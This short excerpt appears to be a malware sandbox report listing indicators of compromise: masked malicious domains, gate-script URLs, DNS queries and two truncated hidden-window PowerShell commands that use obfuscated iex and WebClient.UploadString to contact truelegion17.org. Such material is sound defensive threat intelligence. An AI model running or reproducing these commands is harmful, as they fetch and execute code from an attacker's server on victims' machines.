Technical Information
- 'tr####gion17.org':80
- http://ap##145.org/evreigate.php
- http://ap##145.org/tgate.php?a=#######################################################
- DNS ASK drive.google.com
- DNS ASK do#########ocs.googleusercontent.com
- DNS ASK ap##145.org
- DNS ASK tr####gion17.org
- '%WINDIR%\syswow64\cmd.exe' /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex####@(n#ew###-#ob#jec#t N#######et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//truelegion17.org/leg#ion1#7#/#w#el#co#me...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -command "&{$t='#i#ex####@(n#ew###-#ob#jec#t N#######et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//truelegion17.org/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#...